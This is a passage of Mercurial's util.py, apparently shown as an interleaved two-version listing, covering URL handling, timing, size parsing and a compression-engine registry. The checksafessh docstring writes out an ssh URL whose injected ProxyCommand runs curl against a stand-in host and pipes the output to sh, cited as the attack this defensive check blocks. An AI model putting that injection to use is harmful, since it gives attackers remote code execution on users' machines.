2772 path = None
2769 path = None
2773 if not self.host:
2770 if not self.host:
2774 self.host = None
2771 self.host = None
2775 # path of file:///d is /d
2772 # path of file:///d is /d
2776 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2777 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2778 path = '/' + path
2775 path = '/' + path
2779
2776
2780 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2781 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
2782 if ':' in self.user:
2779 if ':' in self.user:
2783 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2784 if not self.host:
2781 if not self.host:
2785 self.host = None
2782 self.host = None
2786
2783
2787 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2788 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2789 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2790 self._hostport = self.host
2787 self._hostport = self.host
2791 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2792 if not self.host:
2789 if not self.host:
2793 self.host = None
2790 self.host = None
2794
2791
2795 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2796 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2797 raise Abort(_('file:// URLs can only refer to localhost'))
2794 raise Abort(_('file:// URLs can only refer to localhost'))
2798
2795
2799 self.path = path
2796 self.path = path
2800
2797
2801 # leave the query string escaped
2798 # leave the query string escaped
2802 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2803 'path', 'fragment'):
2800 'path', 'fragment'):
2804 v = getattr(self, a)
2801 v = getattr(self, a)
2805 if v is not None:
2802 if v is not None:
2806 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2807
2804
2808 def __repr__(self):
2805 def __repr__(self):
2809 attrs = []
2806 attrs = []
2810 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2811 'query', 'fragment'):
2808 'query', 'fragment'):
2812 v = getattr(self, a)
2809 v = getattr(self, a)
2813 if v is not None:
2810 if v is not None:
2814 attrs.append('%s: %r' % (a, v))
2811 attrs.append('%s: %r' % (a, v))
2815 return '<url %s>' % ', '.join(attrs)
2812 return '<url %s>' % ', '.join(attrs)
2816
2813
2817 def __bytes__(self):
2814 def __bytes__(self):
2818 r"""Join the URL's components back into a URL string.
2815 r"""Join the URL's components back into a URL string.
2819
2816
2820 Examples:
2817 Examples:
2821
2818
2822 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2819 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2823 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2824 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2821 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2825 'http://user:pw@host:80/?foo=bar&baz=42'
2822 'http://user:pw@host:80/?foo=bar&baz=42'
2826 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2823 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2827 'http://user:pw@host:80/?foo=bar%3dbaz'
2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2828 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2825 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2829 'ssh://user:pw@[::1]:2200//home/joe#'
2826 'ssh://user:pw@[::1]:2200//home/joe#'
2830 >>> str(url('http://localhost:80//'))
2827 >>> str(url('http://localhost:80//'))
2831 'http://localhost:80//'
2828 'http://localhost:80//'
2832 >>> str(url('http://localhost:80/'))
2829 >>> str(url('http://localhost:80/'))
2833 'http://localhost:80/'
2830 'http://localhost:80/'
2834 >>> str(url('http://localhost:80'))
2831 >>> str(url('http://localhost:80'))
2835 'http://localhost:80/'
2832 'http://localhost:80/'
2836 >>> str(url('bundle:foo'))
2833 >>> str(url('bundle:foo'))
2837 'bundle:foo'
2834 'bundle:foo'
2838 >>> str(url('bundle://../foo'))
2835 >>> str(url('bundle://../foo'))
2839 'bundle:../foo'
2836 'bundle:../foo'
2840 >>> str(url('path'))
2837 >>> str(url('path'))
2841 'path'
2838 'path'
2842 >>> str(url('file:///tmp/foo/bar'))
2839 >>> str(url('file:///tmp/foo/bar'))
2843 'file:///tmp/foo/bar'
2840 'file:///tmp/foo/bar'
2844 >>> str(url('file:///c:/tmp/foo/bar'))
2841 >>> str(url('file:///c:/tmp/foo/bar'))
2845 'file:///c:/tmp/foo/bar'
2842 'file:///c:/tmp/foo/bar'
2846 >>> print url(r'bundle:foo\bar')
2843 >>> print url(r'bundle:foo\bar')
2847 bundle:foo\bar
2844 bundle:foo\bar
2848 >>> print url(r'file:///D:\data\hg')
2845 >>> print url(r'file:///D:\data\hg')
2849 file:///D:\data\hg
2846 file:///D:\data\hg
2850 """
2847 """
2851 if self._localpath:
2848 if self._localpath:
2852 s = self.path
2849 s = self.path
2853 if self.scheme == 'bundle':
2850 if self.scheme == 'bundle':
2854 s = 'bundle:' + s
2851 s = 'bundle:' + s
2855 if self.fragment:
2852 if self.fragment:
2856 s += '#' + self.fragment
2853 s += '#' + self.fragment
2857 return s
2854 return s
2858
2855
2859 s = self.scheme + ':'
2856 s = self.scheme + ':'
2860 if self.user or self.passwd or self.host:
2857 if self.user or self.passwd or self.host:
2861 s += '//'
2858 s += '//'
2862 elif self.scheme and (not self.path or self.path.startswith('/')
2859 elif self.scheme and (not self.path or self.path.startswith('/')
2863 or hasdriveletter(self.path)):
2860 or hasdriveletter(self.path)):
2864 s += '//'
2861 s += '//'
2865 if hasdriveletter(self.path):
2862 if hasdriveletter(self.path):
2866 s += '/'
2863 s += '/'
2867 if self.user:
2864 if self.user:
2868 s += urlreq.quote(self.user, safe=self._safechars)
2865 s += urlreq.quote(self.user, safe=self._safechars)
2869 if self.passwd:
2866 if self.passwd:
2870 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2871 if self.user or self.passwd:
2868 if self.user or self.passwd:
2872 s += '@'
2869 s += '@'
2873 if self.host:
2870 if self.host:
2874 if not (self.host.startswith('[') and self.host.endswith(']')):
2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2875 s += urlreq.quote(self.host)
2872 s += urlreq.quote(self.host)
2876 else:
2873 else:
2877 s += self.host
2874 s += self.host
2878 if self.port:
2875 if self.port:
2879 s += ':' + urlreq.quote(self.port)
2876 s += ':' + urlreq.quote(self.port)
2880 if self.host:
2877 if self.host:
2881 s += '/'
2878 s += '/'
2882 if self.path:
2879 if self.path:
2883 # TODO: similar to the query string, we should not unescape the
2880 # TODO: similar to the query string, we should not unescape the
2884 # path when we store it, the path might contain '%2f' = '/',
2881 # path when we store it, the path might contain '%2f' = '/',
2885 # which we should *not* escape.
2882 # which we should *not* escape.
2886 s += urlreq.quote(self.path, safe=self._safepchars)
2883 s += urlreq.quote(self.path, safe=self._safepchars)
2887 if self.query:
2884 if self.query:
2888 # we store the query in escaped form.
2885 # we store the query in escaped form.
2889 s += '?' + self.query
2886 s += '?' + self.query
2890 if self.fragment is not None:
2887 if self.fragment is not None:
2891 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2892 return s
2889 return s
2893
2890
2894 __str__ = encoding.strmethod(__bytes__)
2891 __str__ = encoding.strmethod(__bytes__)
2895
2892
2896 def authinfo(self):
2893 def authinfo(self):
2897 user, passwd = self.user, self.passwd
2894 user, passwd = self.user, self.passwd
2898 try:
2895 try:
2899 self.user, self.passwd = None, None
2896 self.user, self.passwd = None, None
2900 s = bytes(self)
2897 s = bytes(self)
2901 finally:
2898 finally:
2902 self.user, self.passwd = user, passwd
2899 self.user, self.passwd = user, passwd
2903 if not self.user:
2900 if not self.user:
2904 return (s, None)
2901 return (s, None)
2905 # authinfo[1] is passed to urllib2 password manager, and its
2902 # authinfo[1] is passed to urllib2 password manager, and its
2906 # URIs must not contain credentials. The host is passed in the
2903 # URIs must not contain credentials. The host is passed in the
2907 # URIs list because Python < 2.4.3 uses only that to search for
2904 # URIs list because Python < 2.4.3 uses only that to search for
2908 # a password.
2905 # a password.
2909 return (s, (None, (s, self.host),
2906 return (s, (None, (s, self.host),
2910 self.user, self.passwd or ''))
2907 self.user, self.passwd or ''))
2911
2908
2912 def isabs(self):
2909 def isabs(self):
2913 if self.scheme and self.scheme != 'file':
2910 if self.scheme and self.scheme != 'file':
2914 return True # remote URL
2911 return True # remote URL
2915 if hasdriveletter(self.path):
2912 if hasdriveletter(self.path):
2916 return True # absolute for our purposes - can't be joined()
2913 return True # absolute for our purposes - can't be joined()
2917 if self.path.startswith(br'\\'):
2914 if self.path.startswith(br'\\'):
2918 return True # Windows UNC path
2915 return True # Windows UNC path
2919 if self.path.startswith('/'):
2916 if self.path.startswith('/'):
2920 return True # POSIX-style
2917 return True # POSIX-style
2921 return False
2918 return False
2922
2919
2923 def localpath(self):
2920 def localpath(self):
2924 if self.scheme == 'file' or self.scheme == 'bundle':
2921 if self.scheme == 'file' or self.scheme == 'bundle':
2925 path = self.path or '/'
2922 path = self.path or '/'
2926 # For Windows, we need to promote hosts containing drive
2923 # For Windows, we need to promote hosts containing drive
2927 # letters to paths with drive letters.
2924 # letters to paths with drive letters.
2928 if hasdriveletter(self._hostport):
2925 if hasdriveletter(self._hostport):
2929 path = self._hostport + '/' + self.path
2926 path = self._hostport + '/' + self.path
2930 elif (self.host is not None and self.path
2927 elif (self.host is not None and self.path
2931 and not hasdriveletter(path)):
2928 and not hasdriveletter(path)):
2932 path = '/' + path
2929 path = '/' + path
2933 return path
2930 return path
2934 return self._origpath
2931 return self._origpath
2935
2932
2936 def islocal(self):
2933 def islocal(self):
2937 '''whether localpath will return something that posixfile can open'''
2934 '''whether localpath will return something that posixfile can open'''
2938 return (not self.scheme or self.scheme == 'file'
2935 return (not self.scheme or self.scheme == 'file'
2939 or self.scheme == 'bundle')
2936 or self.scheme == 'bundle')
2940
2937
2941 def hasscheme(path):
2938 def hasscheme(path):
2942 return bool(url(path).scheme)
2939 return bool(url(path).scheme)
2943
2940
2944 def hasdriveletter(path):
2941 def hasdriveletter(path):
2945 return path and path[1:2] == ':' and path[0:1].isalpha()
2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2946
2943
2947 def urllocalpath(path):
2944 def urllocalpath(path):
2948 return url(path, parsequery=False, parsefragment=False).localpath()
2945 return url(path, parsequery=False, parsefragment=False).localpath()
2949
2946
2950 def checksafessh(path):
2947 def checksafessh(path):
2951 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2952
2949
2953 This is a sanity check for ssh urls. ssh will parse the first item as
2950 This is a sanity check for ssh urls. ssh will parse the first item as
2954 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2955 Let's prevent these potentially exploited urls entirely and warn the
2952 Let's prevent these potentially exploited urls entirely and warn the
2956 user.
2953 user.
2957
2954
2958 Raises an error.Abort when the url is unsafe.
2955 Raises an error.Abort when the url is unsafe.
2959 """
2956 """
2960 path = urlreq.unquote(path)
2957 path = urlreq.unquote(path)
2961 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2962 raise error.Abort(_('potentially unsafe url: %r') %
2959 raise error.Abort(_('potentially unsafe url: %r') %
2963 (path,))
2960 (path,))
2964
2961
2965 def hidepassword(u):
2962 def hidepassword(u):
2966 '''hide user credential in a url string'''
2963 '''hide user credential in a url string'''
2967 u = url(u)
2964 u = url(u)
2968 if u.passwd:
2965 if u.passwd:
2969 u.passwd = '***'
2966 u.passwd = '***'
2970 return bytes(u)
2967 return bytes(u)
2971
2968
2972 def removeauth(u):
2969 def removeauth(u):
2973 '''remove all authentication information from a url string'''
2970 '''remove all authentication information from a url string'''
2974 u = url(u)
2971 u = url(u)
2975 u.user = u.passwd = None
2972 u.user = u.passwd = None
2976 return str(u)
2973 return str(u)
2977
2974
2978 timecount = unitcountfn(
2975 timecount = unitcountfn(
2979 (1, 1e3, _('%.0f s')),
2976 (1, 1e3, _('%.0f s')),
2980 (100, 1, _('%.1f s')),
2977 (100, 1, _('%.1f s')),
2981 (10, 1, _('%.2f s')),
2978 (10, 1, _('%.2f s')),
2982 (1, 1, _('%.3f s')),
2979 (1, 1, _('%.3f s')),
2983 (100, 0.001, _('%.1f ms')),
2980 (100, 0.001, _('%.1f ms')),
2984 (10, 0.001, _('%.2f ms')),
2981 (10, 0.001, _('%.2f ms')),
2985 (1, 0.001, _('%.3f ms')),
2982 (1, 0.001, _('%.3f ms')),
2986 (100, 0.000001, _('%.1f us')),
2983 (100, 0.000001, _('%.1f us')),
2987 (10, 0.000001, _('%.2f us')),
2984 (10, 0.000001, _('%.2f us')),
2988 (1, 0.000001, _('%.3f us')),
2985 (1, 0.000001, _('%.3f us')),
2989 (100, 0.000000001, _('%.1f ns')),
2986 (100, 0.000000001, _('%.1f ns')),
2990 (10, 0.000000001, _('%.2f ns')),
2987 (10, 0.000000001, _('%.2f ns')),
2991 (1, 0.000000001, _('%.3f ns')),
2988 (1, 0.000000001, _('%.3f ns')),
2992 )
2989 )
2993
2990
2994 _timenesting = [0]
2991 _timenesting = [0]
2995
2992
2996 def timed(func):
2993 def timed(func):
2997 '''Report the execution time of a function call to stderr.
2994 '''Report the execution time of a function call to stderr.
2998
2995
2999 During development, use as a decorator when you need to measure
2996 During development, use as a decorator when you need to measure
3000 the cost of a function, e.g. as follows:
2997 the cost of a function, e.g. as follows:
3001
2998
3002 @util.timed
2999 @util.timed
3003 def foo(a, b, c):
3000 def foo(a, b, c):
3004 pass
3001 pass
3005 '''
3002 '''
3006
3003
3007 def wrapper(*args, **kwargs):
3004 def wrapper(*args, **kwargs):
3008 start = timer()
3005 start = timer()
3009 indent = 2
3006 indent = 2
3010 _timenesting[0] += indent
3007 _timenesting[0] += indent
3011 try:
3008 try:
3012 return func(*args, **kwargs)
3009 return func(*args, **kwargs)
3013 finally:
3010 finally:
3014 elapsed = timer() - start
3011 elapsed = timer() - start
3015 _timenesting[0] -= indent
3012 _timenesting[0] -= indent
3016 stderr.write('%s%s: %s\n' %
3013 stderr.write('%s%s: %s\n' %
3017 (' ' * _timenesting[0], func.__name__,
3014 (' ' * _timenesting[0], func.__name__,
3018 timecount(elapsed)))
3015 timecount(elapsed)))
3019 return wrapper
3016 return wrapper
3020
3017
3021 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3018 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3022 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3019 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3023
3020
3024 def sizetoint(s):
3021 def sizetoint(s):
3025 '''Convert a space specifier to a byte count.
3022 '''Convert a space specifier to a byte count.
3026
3023
3027 >>> sizetoint('30')
3024 >>> sizetoint('30')
3028 30
3025 30
3029 >>> sizetoint('2.2kb')
3026 >>> sizetoint('2.2kb')
3030 2252
3027 2252
3031 >>> sizetoint('6M')
3028 >>> sizetoint('6M')
3032 6291456
3029 6291456
3033 '''
3030 '''
3034 t = s.strip().lower()
3031 t = s.strip().lower()
3035 try:
3032 try:
3036 for k, u in _sizeunits:
3033 for k, u in _sizeunits:
3037 if t.endswith(k):
3034 if t.endswith(k):
3038 return int(float(t[:-len(k)]) * u)
3035 return int(float(t[:-len(k)]) * u)
3039 return int(t)
3036 return int(t)
3040 except ValueError:
3037 except ValueError:
3041 raise error.ParseError(_("couldn't parse size: %s") % s)
3038 raise error.ParseError(_("couldn't parse size: %s") % s)
3042
3039
3043 class hooks(object):
3040 class hooks(object):
3044 '''A collection of hook functions that can be used to extend a
3041 '''A collection of hook functions that can be used to extend a
3045 function's behavior. Hooks are called in lexicographic order,
3042 function's behavior. Hooks are called in lexicographic order,
3046 based on the names of their sources.'''
3043 based on the names of their sources.'''
3047
3044
3048 def __init__(self):
3045 def __init__(self):
3049 self._hooks = []
3046 self._hooks = []
3050
3047
3051 def add(self, source, hook):
3048 def add(self, source, hook):
3052 self._hooks.append((source, hook))
3049 self._hooks.append((source, hook))
3053
3050
3054 def __call__(self, *args):
3051 def __call__(self, *args):
3055 self._hooks.sort(key=lambda x: x[0])
3052 self._hooks.sort(key=lambda x: x[0])
3056 results = []
3053 results = []
3057 for source, hook in self._hooks:
3054 for source, hook in self._hooks:
3058 results.append(hook(*args))
3055 results.append(hook(*args))
3059 return results
3056 return results
3060
3057
3061 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3058 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3062 '''Yields lines for a nicely formatted stacktrace.
3059 '''Yields lines for a nicely formatted stacktrace.
3063 Skips the 'skip' last entries, then return the last 'depth' entries.
3060 Skips the 'skip' last entries, then return the last 'depth' entries.
3064 Each file+linenumber is formatted according to fileline.
3061 Each file+linenumber is formatted according to fileline.
3065 Each line is formatted according to line.
3062 Each line is formatted according to line.
3066 If line is None, it yields:
3063 If line is None, it yields:
3067 length of longest filepath+line number,
3064 length of longest filepath+line number,
3068 filepath+linenumber,
3065 filepath+linenumber,
3069 function
3066 function
3070
3067
3071 Not be used in production code but very convenient while developing.
3068 Not be used in production code but very convenient while developing.
3072 '''
3069 '''
3073 entries = [(fileline % (fn, ln), func)
3070 entries = [(fileline % (fn, ln), func)
3074 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3071 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3075 ][-depth:]
3072 ][-depth:]
3076 if entries:
3073 if entries:
3077 fnmax = max(len(entry[0]) for entry in entries)
3074 fnmax = max(len(entry[0]) for entry in entries)
3078 for fnln, func in entries:
3075 for fnln, func in entries:
3079 if line is None:
3076 if line is None:
3080 yield (fnmax, fnln, func)
3077 yield (fnmax, fnln, func)
3081 else:
3078 else:
3082 yield line % (fnmax, fnln, func)
3079 yield line % (fnmax, fnln, func)
3083
3080
3084 def debugstacktrace(msg='stacktrace', skip=0,
3081 def debugstacktrace(msg='stacktrace', skip=0,
3085 f=stderr, otherf=stdout, depth=0):
3082 f=stderr, otherf=stdout, depth=0):
3086 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3083 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3087 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3084 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3088 By default it will flush stdout first.
3085 By default it will flush stdout first.
3089 It can be used everywhere and intentionally does not require an ui object.
3086 It can be used everywhere and intentionally does not require an ui object.
3090 Not be used in production code but very convenient while developing.
3087 Not be used in production code but very convenient while developing.
3091 '''
3088 '''
3092 if otherf:
3089 if otherf:
3093 otherf.flush()
3090 otherf.flush()
3094 f.write('%s at:\n' % msg.rstrip())
3091 f.write('%s at:\n' % msg.rstrip())
3095 for line in getstackframes(skip + 1, depth=depth):
3092 for line in getstackframes(skip + 1, depth=depth):
3096 f.write(line)
3093 f.write(line)
3097 f.flush()
3094 f.flush()
3098
3095
3099 class dirs(object):
3096 class dirs(object):
3100 '''a multiset of directory names from a dirstate or manifest'''
3097 '''a multiset of directory names from a dirstate or manifest'''
3101
3098
3102 def __init__(self, map, skip=None):
3099 def __init__(self, map, skip=None):
3103 self._dirs = {}
3100 self._dirs = {}
3104 addpath = self.addpath
3101 addpath = self.addpath
3105 if safehasattr(map, 'iteritems') and skip is not None:
3102 if safehasattr(map, 'iteritems') and skip is not None:
3106 for f, s in map.iteritems():
3103 for f, s in map.iteritems():
3107 if s[0] != skip:
3104 if s[0] != skip:
3108 addpath(f)
3105 addpath(f)
3109 else:
3106 else:
3110 for f in map:
3107 for f in map:
3111 addpath(f)
3108 addpath(f)
3112
3109
3113 def addpath(self, path):
3110 def addpath(self, path):
3114 dirs = self._dirs
3111 dirs = self._dirs
3115 for base in finddirs(path):
3112 for base in finddirs(path):
3116 if base in dirs:
3113 if base in dirs:
3117 dirs[base] += 1
3114 dirs[base] += 1
3118 return
3115 return
3119 dirs[base] = 1
3116 dirs[base] = 1
3120
3117
3121 def delpath(self, path):
3118 def delpath(self, path):
3122 dirs = self._dirs
3119 dirs = self._dirs
3123 for base in finddirs(path):
3120 for base in finddirs(path):
3124 if dirs[base] > 1:
3121 if dirs[base] > 1:
3125 dirs[base] -= 1
3122 dirs[base] -= 1
3126 return
3123 return
3127 del dirs[base]
3124 del dirs[base]
3128
3125
3129 def __iter__(self):
3126 def __iter__(self):
3130 return iter(self._dirs)
3127 return iter(self._dirs)
3131
3128
3132 def __contains__(self, d):
3129 def __contains__(self, d):
3133 return d in self._dirs
3130 return d in self._dirs
3134
3131
3135 if safehasattr(parsers, 'dirs'):
3132 if safehasattr(parsers, 'dirs'):
3136 dirs = parsers.dirs
3133 dirs = parsers.dirs
3137
3134
3138 def finddirs(path):
3135 def finddirs(path):
3139 pos = path.rfind('/')
3136 pos = path.rfind('/')
3140 while pos != -1:
3137 while pos != -1:
3141 yield path[:pos]
3138 yield path[:pos]
3142 pos = path.rfind('/', 0, pos)
3139 pos = path.rfind('/', 0, pos)
3143
3140
3144 # compression code
3141 # compression code
3145
3142
3146 SERVERROLE = 'server'
3143 SERVERROLE = 'server'
3147 CLIENTROLE = 'client'
3144 CLIENTROLE = 'client'
3148
3145
3149 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3146 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3150 (u'name', u'serverpriority',
3147 (u'name', u'serverpriority',
3151 u'clientpriority'))
3148 u'clientpriority'))
3152
3149
3153 class compressormanager(object):
3150 class compressormanager(object):
3154 """Holds registrations of various compression engines.
3151 """Holds registrations of various compression engines.
3155
3152
3156 This class essentially abstracts the differences between compression
3153 This class essentially abstracts the differences between compression
3157 engines to allow new compression formats to be added easily, possibly from
3154 engines to allow new compression formats to be added easily, possibly from
3158 extensions.
3155 extensions.
3159
3156
3160 Compressors are registered against the global instance by calling its
3157 Compressors are registered against the global instance by calling its
3161 ``register()`` method.
3158 ``register()`` method.
3162 """
3159 """
3163 def __init__(self):
3160 def __init__(self):
3164 self._engines = {}
3161 self._engines = {}
3165 # Bundle spec human name to engine name.
3162 # Bundle spec human name to engine name.
3166 self._bundlenames = {}
3163 self._bundlenames = {}
3167 # Internal bundle identifier to engine name.
3164 # Internal bundle identifier to engine name.
3168 self._bundletypes = {}
3165 self._bundletypes = {}
3169 # Revlog header to engine name.
3166 # Revlog header to engine name.
3170 self._revlogheaders = {}
3167 self._revlogheaders = {}
3171 # Wire proto identifier to engine name.
3168 # Wire proto identifier to engine name.
3172 self._wiretypes = {}
3169 self._wiretypes = {}
3173
3170
3174 def __getitem__(self, key):
3171 def __getitem__(self, key):
3175 return self._engines[key]
3172 return self._engines[key]
3176
3173
3177 def __contains__(self, key):
3174 def __contains__(self, key):
3178 return key in self._engines
3175 return key in self._engines
3179
3176
3180 def __iter__(self):
3177 def __iter__(self):
3181 return iter(self._engines.keys())
3178 return iter(self._engines.keys())
3182
3179
3183 def register(self, engine):
3180 def register(self, engine):
3184 """Register a compression engine with the manager.
3181 """Register a compression engine with the manager.
3185
3182
3186 The argument must be a ``compressionengine`` instance.
3183 The argument must be a ``compressionengine`` instance.
3187 """
3184 """
3188 if not isinstance(engine, compressionengine):
3185 if not isinstance(engine, compressionengine):
3189 raise ValueError(_('argument must be a compressionengine'))
3186 raise ValueError(_('argument must be a compressionengine'))
3190
3187
3191 name = engine.name()
3188 name = engine.name()
3192
3189
3193 if name in self._engines:
3190 if name in self._engines:
3194 raise error.Abort(_('compression engine %s already registered') %
3191 raise error.Abort(_('compression engine %s already registered') %
3195 name)
3192 name)
3196
3193
3197 bundleinfo = engine.bundletype()
3194 bundleinfo = engine.bundletype()
3198 if bundleinfo:
3195 if bundleinfo:
3199 bundlename, bundletype = bundleinfo
3196 bundlename, bundletype = bundleinfo
3200
3197
3201 if bundlename in self._bundlenames:
3198 if bundlename in self._bundlenames:
3202 raise error.Abort(_('bundle name %s already registered') %
3199 raise error.Abort(_('bundle name %s already registered') %
3203 bundlename)
3200 bundlename)
3204 if bundletype in self._bundletypes:
3201 if bundletype in self._bundletypes:
3205 raise error.Abort(_('bundle type %s already registered by %s') %
3202 raise error.Abort(_('bundle type %s already registered by %s') %
3206 (bundletype, self._bundletypes[bundletype]))
3203 (bundletype, self._bundletypes[bundletype]))
3207
3204
3208 # No external facing name declared.
3205 # No external facing name declared.
3209 if bundlename:
3206 if bundlename:
3210 self._bundlenames[bundlename] = name
3207 self._bundlenames[bundlename] = name
3211
3208
3212 self._bundletypes[bundletype] = name
3209 self._bundletypes[bundletype] = name
3213
3210
3214 wiresupport = engine.wireprotosupport()
3211 wiresupport = engine.wireprotosupport()
3215 if wiresupport:
3212 if wiresupport:
3216 wiretype = wiresupport.name
3213 wiretype = wiresupport.name
3217 if wiretype in self._wiretypes:
3214 if wiretype in self._wiretypes:
3218 raise error.Abort(_('wire protocol compression %s already '
3215 raise error.Abort(_('wire protocol compression %s already '
3219 'registered by %s') %
3216 'registered by %s') %
3220 (wiretype, self._wiretypes[wiretype]))
3217 (wiretype, self._wiretypes[wiretype]))
3221
3218
3222 self._wiretypes[wiretype] = name
3219 self._wiretypes[wiretype] = name
3223
3220
3224 revlogheader = engine.revlogheader()
3221 revlogheader = engine.revlogheader()
3225 if revlogheader and revlogheader in self._revlogheaders:
3222 if revlogheader and revlogheader in self._revlogheaders:
3226 raise error.Abort(_('revlog header %s already registered by %s') %
3223 raise error.Abort(_('revlog header %s already registered by %s') %
3227 (revlogheader, self._revlogheaders[revlogheader]))
3224 (revlogheader, self._revlogheaders[revlogheader]))
3228
3225
3229 if revlogheader:
3226 if revlogheader:
3230 self._revlogheaders[revlogheader] = name
3227 self._revlogheaders[revlogheader] = name
3231
3228
3232 self._engines[name] = engine
3229 self._engines[name] = engine
3233
3230
3234 @property
3231 @property
3235 def supportedbundlenames(self):
3232 def supportedbundlenames(self):
3236 return set(self._bundlenames.keys())
3233 return set(self._bundlenames.keys())
3237
3234
3238 @property
3235 @property
3239 def supportedbundletypes(self):
3236 def supportedbundletypes(self):
3240 return set(self._bundletypes.keys())
3237 return set(self._bundletypes.keys())
3241
3238
3242 def forbundlename(self, bundlename):
3239 def forbundlename(self, bundlename):
3243 """Obtain a compression engine registered to a bundle name.
3240 """Obtain a compression engine registered to a bundle name.
3244
3241
3245 Will raise KeyError if the bundle type isn't registered.
3242 Will raise KeyError if the bundle type isn't registered.
3246
3243
3247 Will abort if the engine is known but not available.
3244 Will abort if the engine is known but not available.
3248 """
3245 """
3249 engine = self._engines[self._bundlenames[bundlename]]
3246 engine = self._engines[self._bundlenames[bundlename]]
3250 if not engine.available():
3247 if not engine.available():
3251 raise error.Abort(_('compression engine %s could not be loaded') %
3248 raise error.Abort(_('compression engine %s could not be loaded') %
3252 engine.name())
3249 engine.name())
3253 return engine
3250 return engine
3254
3251
3255 def forbundletype(self, bundletype):
3252 def forbundletype(self, bundletype):
3256 """Obtain a compression engine registered to a bundle type.
3253 """Obtain a compression engine registered to a bundle type.
3257
3254
3258 Will raise KeyError if the bundle type isn't registered.
3255 Will raise KeyError if the bundle type isn't registered.
3259
3256
3260 Will abort if the engine is known but not available.
3257 Will abort if the engine is known but not available.
3261 """
3258 """
3262 engine = self._engines[self._bundletypes[bundletype]]
3259 engine = self._engines[self._bundletypes[bundletype]]
3263 if not engine.available():
3260 if not engine.available():
3264 raise error.Abort(_('compression engine %s could not be loaded') %
3261 raise error.Abort(_('compression engine %s could not be loaded') %
3265 engine.name())
3262 engine.name())
3266 return engine
3263 return engine
3267
3264
3268 def supportedwireengines(self, role, onlyavailable=True):
3265 def supportedwireengines(self, role, onlyavailable=True):
3269 """Obtain compression engines that support the wire protocol.
3266 """Obtain compression engines that support the wire protocol.
3270
3267
3271 Returns a list of engines in prioritized order, most desired first.
3268 Returns a list of engines in prioritized order, most desired first.
3272
3269
3273 If ``onlyavailable`` is set, filter out engines that can't be
3270 If ``onlyavailable`` is set, filter out engines that can't be
3274 loaded.
3271 loaded.
3275 """
3272 """
3276 assert role in (SERVERROLE, CLIENTROLE)
3273 assert role in (SERVERROLE, CLIENTROLE)
3277
3274
3278 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3275 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3279
3276
3280 engines = [self._engines[e] for e in self._wiretypes.values()]
3277 engines = [self._engines[e] for e in self._wiretypes.values()]
3281 if onlyavailable:
3278 if onlyavailable:
3282 engines = [e for e in engines if e.available()]
3279 engines = [e for e in engines if e.available()]
3283
3280
3284 def getkey(e):
3281 def getkey(e):
3285 # Sort first by priority, highest first. In case of tie, sort
3282 # Sort first by priority, highest first. In case of tie, sort
3286 # alphabetically. This is arbitrary, but ensures output is
3283 # alphabetically. This is arbitrary, but ensures output is
3287 # stable.
3284 # stable.
3288 w = e.wireprotosupport()
3285 w = e.wireprotosupport()
3289 return -1 * getattr(w, attr), w.name
